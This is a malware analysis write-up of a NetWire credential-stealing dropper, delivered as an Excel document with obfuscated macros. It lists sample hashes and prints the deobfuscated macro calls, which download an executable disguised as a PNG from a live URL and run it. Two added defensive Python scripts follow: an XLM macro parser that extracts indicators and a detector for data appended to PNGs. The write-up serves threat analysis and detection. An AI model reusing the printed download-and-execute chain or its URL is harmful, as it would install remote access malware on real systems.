NetWire macro dropper

Overview

NetWire is an old remote access tool, widely used around 2012, that has recently resurfaced in phishing campaigns delivered by email.

Its purpose is to steal credentials, log keystrokes and send anything useful back to the attacker's C2.

Fun fact: according to IBM X-Force IRIS, this malware has been seen in APT attacks and in the hands of Nigerian scammers, and it can be bought on the dark web for $40 to $180 depending on the marketplace.

Functionalities

  • Credential stealer
  • Keylogger
  • Remote Access Tool

General file information

MD5: 332f8351c92d72260846a9f8b5fdd7cb

SHA1: 1b924898977e10900eafcd655e282ae49bb476c1

SHA256: c6f066035c64a1309d1d958b6536882847da51f2eb5cebe670b05bbdd97c12d1

CAPE analysis: here

Any Run analysis: here

Hybrid Analysis: here

MITRE NetWire malware: here

Technical analysis

Macros

The malicious file is an Excel document that asks the user to enable macros.

There is not much to say beyond how the macro downloads the payload and executes it.

The image below shows the content of the second page; from it we extracted the URLs and paths that the macro uses to download and install the payload.

To avoid detection, the strings holding the URL and the other parameters are built by concatenating the characters one at a time, and the results are passed to the CALL functions at the end of the page.

Below are the deobfuscated strings and the calling functions that create two directories, download the payload and execute it.

CALL("Kernel32","CreateDirectoryA","JCJ","C:\jokwzPk",0)
CALL("Kernel32","CreateDirectoryA","JCJ","C:\jokwzPk\luFzdsM",0)
CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://17-14.com/wp-includes/images/2019.png","C:\jokwzPk\luFzdsM\LJDVSoK.exe",0,0)
CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jokwzPk\luFzdsM\LJDVSoK.exe",,0,0)
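The four CALL lines above are enough to write a small triage parser for Excel 4.0 (XLM) macros: it collapses the character-by-character concatenation the page describes, splits each CALL into DLL, function, type string and arguments, checks the argument count against the type string, pulls out URLs and file paths as IOCs, and flags the download-then-execute combination. This is an added example, not the author's tooling. The input embeds the deobfuscated lines from this page plus one constructed line in the assumed obfuscated shape ("a"&"b"&CHAR(99)); the exact obfuscation form used by the sample is not shown on the page, so handling of "&" and CHAR() is an assumption.

```python
"""Parse XLM CALL() formulas, deobfuscate concatenated strings, extract IOCs.

Added example for this write-up (not the author's code). The sample below
contains the page's deobfuscated CALL lines and one constructed line that
imitates per-character concatenation (assumed shape: "a"&"b"&CHAR(99)).
"""
import re
from typing import Dict, List

SAMPLE_MACRO = r'''
CALL("Kernel32","CreateDirectoryA","JCJ","C:\jokwzPk",0)
CALL("Kernel32","CreateDirectoryA","JCJ","C:\jokwzPk\luFzdsM",0)
CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://17-14.com/wp-includes/images/2019.png","C:\jokwzPk\luFzdsM\LJDVSoK.exe",0,0)
CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jokwzPk\luFzdsM\LJDVSoK.exe",,0,0)
CALL("Kern"&"el32","Get"&CHAR(84)&"ickCount","J")
'''

# APIs that download a file / run a program (lower-cased for matching).
DOWNLOAD_APIS = {"urldownloadtofilea", "urldownloadtofilew", "urldownloadtocachefilea"}
EXEC_APIS = {"shellexecutea", "shellexecutew", "winexec", "createprocessa", "createprocessw"}

CALL_RE = re.compile(r'CALL\((.*)\)\s*$')


def decode_concat(formula: str) -> str:
    """Collapse "a"&"b"&CHAR(99) into "abc" (assumed obfuscation shape).

    CHAR(34) would yield a stray quote and is not handled here.
    """
    formula = re.sub(r'CHAR\((\d+)\)', lambda m: '"%s"' % chr(int(m.group(1))), formula)
    return formula.replace('"&"', '')


def split_args(body: str) -> List[str]:
    """Split on commas outside double quotes; keeps empty args (',,')."""
    args, cur, in_str = [], [], False
    for ch in body:
        if ch == '"':
            in_str = not in_str
        elif ch == ',' and not in_str:
            args.append(''.join(cur))
            cur = []
            continue
        cur.append(ch)
    args.append(''.join(cur))
    return [a.strip().strip('"') for a in args]


def parse_calls(macro_text: str) -> List[Dict[str, object]]:
    """Return one record per CALL() line: dll, func, type string, args."""
    calls = []
    for line in macro_text.splitlines():
        m = CALL_RE.match(decode_concat(line.strip()))
        if not m:
            continue
        fields = split_args(m.group(1))
        if len(fields) < 3:
            continue
        dll, func, types = fields[0], fields[1], fields[2]
        args = fields[3:]
        calls.append({
            "dll": dll, "func": func, "types": types, "args": args,
            # first char of the type string is the return type, the rest are args
            "arity_ok": len(types) - 1 == len(args),
        })
    return calls


def extract_iocs(calls: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Collect URL and Windows path arguments from the parsed calls."""
    urls, paths = set(), set()
    for c in calls:
        for a in c["args"]:
            if re.match(r'https?://', a, re.I):
                urls.add(a)
            elif re.match(r'[A-Za-z]:\\', a):
                paths.add(a)
    return {"urls": sorted(urls), "paths": sorted(paths)}


def is_download_and_execute(calls: List[Dict[str, object]]) -> bool:
    """True when the macro both downloads a file and launches a program."""
    funcs = {str(c["func"]).lower() for c in calls}
    return bool(funcs & DOWNLOAD_APIS) and bool(funcs & EXEC_APIS)


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE_MACRO)
    for c in parsed:
        print(c["dll"], c["func"], c["args"], "arity_ok=%s" % c["arity_ok"])
    print(extract_iocs(parsed))
    print("download-and-execute chain:", is_download_and_execute(parsed))
```

The arity check is worth keeping: CALL type strings are easy to get wrong when hand-deobfuscating, and a mismatch usually means a comma inside a string literal was split or a CHAR(34) slipped through.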

Lastly, the downloaded PNG is actually an executable packed with NSIS and can be extracted with 7-Zip.

The PNG in the picture has something interesting (most likely NetWire) appended after its last byte:

At this point we knew that the malicious executable was being extracted / read from this PNG, but we had no clue how to analyse it, since the debugger crashed every time.
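Data sitting after a PNG's IEND chunk is easy to find without a debugger: walk the chunk list, stop at IEND, and whatever follows is an overlay. The script below does that and reports whether the overlay starts with an MZ header. It is an added example, not the author's tooling; the PNG bytes are constructed inline (a minimal 1x1 image followed by a fake MZ-prefixed payload), so nothing here is the sample from the page.

```python
"""Report data appended after a PNG's IEND chunk (an 'overlay').

Added example for this write-up (not the author's code). The PNG is built
inline: a minimal valid 1x1 grayscale image followed by a constructed fake
payload that begins with 'MZ'.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_minimal_png() -> bytes:
    """A valid 1x1 8-bit grayscale PNG (constructed sample input)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed fake payload: a DOS stub header lookalike, nothing executable.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"constructed overlay"
SAMPLE_WITH_OVERLAY = build_minimal_png() + FAKE_PAYLOAD


def png_overlay(data: bytes) -> dict:
    """Walk chunks up to IEND and return what follows it.

    Raises ValueError on a non-PNG, a truncated chunk, a CRC mismatch or a
    missing IEND, so a corrupted file is not mistaken for one with an overlay.
    """
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    off = len(PNG_SIG)
    while off + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        end = off + 12 + length  # 4 length + 4 type + data + 4 CRC
        if end > len(data):
            raise ValueError("truncated chunk %r at offset %d" % (ctype, off))
        expected = struct.unpack(">I", data[end - 4:end])[0]
        if zlib.crc32(data[off + 4:end - 4]) & 0xFFFFFFFF != expected:
            raise ValueError("bad CRC in chunk %r at offset %d" % (ctype, off))
        off = end
        if ctype == b"IEND":
            break
    else:
        raise ValueError("no IEND chunk")
    overlay = data[off:]
    return {
        "iend_end": off,
        "overlay_size": len(overlay),
        "looks_like_pe": overlay[:2] == b"MZ",
        "overlay": overlay,
    }


if __name__ == "__main__":
    report = png_overlay(SAMPLE_WITH_OVERLAY)
    print("IEND ends at offset", report["iend_end"])
    print("overlay bytes:", report["overlay_size"], "MZ header:", report["looks_like_pe"])
```

On a real file, the overlay bytes can be written out and handed to 7-Zip (for an NSIS installer) or a PE parser; the CRC check matters because image viewers happily render a PNG whose trailing chunks were mangled, and a walker that ignores CRCs would misreport where the image ends.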
